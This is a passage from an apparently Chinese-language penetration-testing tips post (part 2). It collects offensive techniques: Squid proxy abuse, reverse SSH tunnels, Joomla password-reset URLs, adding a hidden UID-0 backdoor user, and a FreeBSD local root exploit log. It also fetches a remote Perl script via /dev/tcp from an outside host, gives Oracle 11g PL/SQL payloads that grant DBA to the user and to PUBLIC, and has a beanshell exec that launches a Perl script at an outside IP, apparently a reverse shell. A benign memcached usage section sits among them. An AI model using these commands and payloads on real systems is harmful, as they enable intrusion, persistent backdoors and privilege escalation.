

Linux渗透技巧+实战手记(2)


成功上传
以上就是实战技巧

四.squid渗透技巧
nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
动画地址和密码:
http://www.neeao.com/share/cnbir ... %BC%8F%E6%B4%9E.rar

五.SSH端口转发
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

六.joomla渗透小技巧
确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码
index.php?option=com_user&view=reset&layout=confirm

七: Linux添加UID为0的root用户
useradd -o -u 0 nothack

八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*

  • calling nmount()
    * [!] nmount error: -1030740736
    * nmount: Unknown error: -1030740736
    * [argp@julius ~]$ id
    * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)

    九.ldap技巧更新(xi4oyu提供)
    ldapsearch -x -s base -b "" "objectClass=*" +
能够获得 LDAP server 的 version、naming context、加密选项、认证方式等详细信息。

ldapsearch -x -b '' -s base '(objectclass=*)' namingContexts

获取namingContexts

具体的 OID 信息可以在 http://www.alvestrand.no/objectid/top.html 查到

列树

ldapsearch -x -H ldap://xxxxx/

猜测,看是否可写

ldapadd .....

找slapd.conf

openldap/ldap.conf

local:

slapcat

十.memcached渗透技巧
memcached telnet 操作

telnet localhost 11211
//保存
set good 32 0 10
helloworld
STORED

//取回
gets good
VALUE good 32 10 10
helloworld
END

//替换
replace good 32 0 10
worldhello
STORED
get good
VALUE good 32 10
worldhello
END

//尾部添加
append good 32 0 5
after
STORED
get good
VALUE good 32 15
worldhelloafter
END

//头部添加
prepend good 32 0 6
before
STORED
get good
VALUE good 32 21
beforeworldhelloafter
END

//删除
delete good
DELETED
get good
END


delete good
NOT_FOUND


cas good 32 0 10 hel
helloworld
EXISTS

gets good
VALUE good 32 10 10
helloworld
END


cas bad 32 0 10 good
worldhello
NOT_FOUND


//统计
stats items
STAT items:1:number 1
STAT items:1:age 24
STAT items:1:evicted 0
STAT items:1:outofmemory 0
END


stats sizes
96 1
END

stats slabs
STAT 1:chunk_size 88
STAT 1:chunks_per_page 11915
STAT 1:total_pages 1
STAT 1:total_chunks 11915
STAT 1:used_chunks 11914
STAT 1:free_chunks 1
STAT 1:free_chunks_end 11913
STAT 2:chunk_size 112
STAT 2:chunks_per_page 9362
STAT 2:total_pages 1
STAT 2:total_chunks 9362
STAT 2:used_chunks 9361
STAT 2:free_chunks 1
STAT 2:free_chunks_end 9361
STAT 5:chunk_size 232
STAT 5:chunks_per_page 4519
STAT 5:total_pages 1
STAT 5:total_chunks 4519
STAT 5:used_chunks 4518
STAT 5:free_chunks 1
STAT 5:free_chunks_end 4518
STAT active_slabs 3
STAT total_malloced 3145472
END


stats items
STAT items:1:number 1
STAT items:1:age 1768
STAT items:1:evicted 0
STAT items:1:outofmemory 0
END

stats
STAT pid 18261
STAT uptime 528593
STAT time 1237277383
STAT version 1.2.6
STAT pointer_size 32
STAT rusage_user 0.004999
STAT rusage_system 0.015997
STAT curr_items 1
STAT total_items 2
STAT bytes 66
STAT curr_connections 2
STAT total_connections 13
STAT connection_structures 3
STAT cmd_get 11
STAT cmd_set 8
STAT get_hits 2
STAT get_misses 9
STAT evictions 0
STAT bytes_read 1342
STAT bytes_written 8752
STAT limit_maxbytes 134217728

STAT threads 1
END


使用 /usr/bin/perl /root/memcached-1.2.6/scripts/memcached-tool localhost:11211
output
# Item_Size   Max_age 1MB_pages Count   Full?
1      88 B     1531 s       1       1      no
2     112 B        0 s       1       0      no
5     232 B        0 s       1       0      no

# slab class 编号
Item_Size chunk 大小
Max_age LRU 内最旧记录的生存时间
1MB_pages 分配给该 slab 的页数
Count slab 内的记录数
Full? slab 是否已满(即不再有空闲 chunk)

十一.无wget下载文件
假设要下载http://yese.yi.org/c.pl

exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0n" >&5 && cat<&5 > c.pl

当然http头你要自己去掉

当然,你用nc -l -p 80 <c.pl 就不用这么麻烦了

十二.ORACLE 11G提权
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判断登录权限
select * from session_privs;
CREATE SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = 'GREMLIN(用户名)';

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT \'GRANT\' USER(), \'SYS\', \'java.io.FilePermission\', \'<<ALL FILES>>\', \'execute\', \'ENABLE\' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
SELECT TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = '用户';

connect 普通用户
set serveroutput on
exec dbms_java.set_output(10000);

SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA(\'ID\', \'oracle/aurora/rdbms/DbmsJava\', \'SYS\', \'writeOutputToFile\', \'TEXT\', NULL, NULL, NULL, NULL,0,1,1,1,1,0, \'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;\'BEGIN EXECUTE IMMEDIATE \'\'GRANT DBA TO 用户\'\'; END;\', \'BEGIN NULL; END;\') FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(\'NO_SUCH_SUBSCRIPTION\', SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC(\'FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR\');

SELECT DBMS_JAVA.RUNJAVA(\'oracle/aurora/util/Test\') FROM DUAL;

SET ROLE DBA;

十三:beanshell渗透技巧
exec("/usr/bin/perl /var/tmp/c.pl 218.56.57.151 53");
实例:XXX易多台 beanshell 漏洞暂不发布,等漏洞修补后再发布

